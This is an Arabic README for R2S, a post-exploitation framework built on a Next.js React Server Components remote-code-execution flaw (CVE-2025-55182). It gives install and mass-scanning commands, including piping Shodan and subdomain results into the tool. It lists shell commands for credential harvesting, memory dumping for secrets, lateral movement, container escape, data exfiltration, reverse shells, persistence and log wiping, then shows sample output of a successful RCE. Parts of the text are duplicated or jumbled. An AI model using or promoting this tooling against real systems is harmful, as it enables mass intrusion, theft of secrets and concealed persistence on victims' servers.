R2S هو إطار عمل شامل للاستغلال وما بعد الاستغلال يستهدف ثغرة Next.js React Server Components (CVE-2025-55182). يوفر واجهة أوامر تفاعلية بميزات متقدمة لاختبار الاختراق، بما في ذلك نقل الملفات، والثبات، وجمع المعلومات، وفحوصات تصعيد الامتيازات، والمزيد.
إطار متقدم لاستغلال ما بعد الاختراق لمكونات React Server Components الخاصة بـ Next.js (RCE)
R2S هو إطار استغلال واستغلال ما بعد الاختراق شامل يستهدف ثغرة مكونات React Server Components في Next.js (CVE-2025-55182). يوفر شفرة تفاعلية بميزات متقدمة لاختبار الاختراق، بما في ذلك نقل الملفات، التثبيت، التعداد، فحوصات رفع الامتيازات، والمزيد.
.env وملفات الإعدادات# Python 3.6 أو أعلى
python3 --version
# تثبيت التبعيات
pip3 install requests urllib3
# استنساخ أو تنزيل الأداة
cd r2s-main
# جعله قابلًا للتنفيذ (اختياري)
chmod +x r2s_enhanced.py
# تشغيل الأداة
python3 r2s_enhanced.py -h
python3 r2s_enhanced.py [OPTIONS]
| الخيار | الوصف | الافتراضي |
|---|---|---|
-u, --url | رابط الهدف الفردي | - |
-l, --list | ملف يحتوي على قائمة الروابط | - |
-c, --cmd | الأمر الأولي للتنفيذ | id |
-t, --threads | عدد خيوط الفحص | 30 |
-p, --proxy | وكيل HTTP (مثال: http://127.0.0.1:8080) | - |
-v, --verbose | تفعيل الإخراج التفصيلي | False |
--http-port | منفذ خادم HTTP لنقل الملفات | 8000 |
python3 r2s_enhanced.py -u http://target.com
python3 r2s_enhanced.py -l targets.txt -t 50
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
بمجرد الوصول إلى RCE، ستدخل شفرة تفاعلية بهذه الأوامر:
upload <local_file> <remote_path> # رفع ملف إلى الهدف
download <remote_file> <local_path> # تنزيل ملف من الهدف
cd <directory> # تغيير دليل العمل
pwd # طباعة دليل العمل
enum # تعداد النظام الكامل
privesc # فحوصات رفع الامتيازات
harvest # جمع بيانات الاعتماد
portscan <ip> # فحص منافذ الشبكة الداخلية
memdump [pid] # تفريغ ذاكرة العملية للأسرار
lateral # فرص الحركة الجانبية
escape # نواقل الهروب من الحاويات
exfil [type] # استخراج البيانات (env/config/keys/db/logs/all)
reverse <lhost> <lport> # تجربة حمولات شل عكسي متعددة
persist # إضافة تثبيت أساسي
advpersist # إضافة تثبيت متقدم
stealth # مسح السجلات وإخفاء الآثار
save # حفظ الجلسة الحالية
help, ? # إظهار رسالة المساعدة
exit, quit # الخروج من الشفرة التفاعلية
تنفيذ أي أمر شل مباشرة:
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
$ python3 r2s_enhanced.py -u http://vulnerable-app.com
_ __ __ ____
/ | / /__ _ __/ /_/ __ \________
/ |/ / _ \| |/_/ __/ /_/ / ___/ _ \
/ /| / __/> </_ _/ _, _/ /__/ __/
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/
Next.js RSC Exploit Tool (CVE-2025-55182)
Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
>> CREDIT( G4rxd )
[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id
[VULN] http://vulnerable-app.com >>> RCE SUCCESS
Output: uid=1000(node) gid=1000(node) groups=1000(node)
[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse
[+] HTTP server started on 192.168.1.100:8000
next-rce:/app$
next-rce:/app$ enum
[*] Starting automated enumeration...
============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"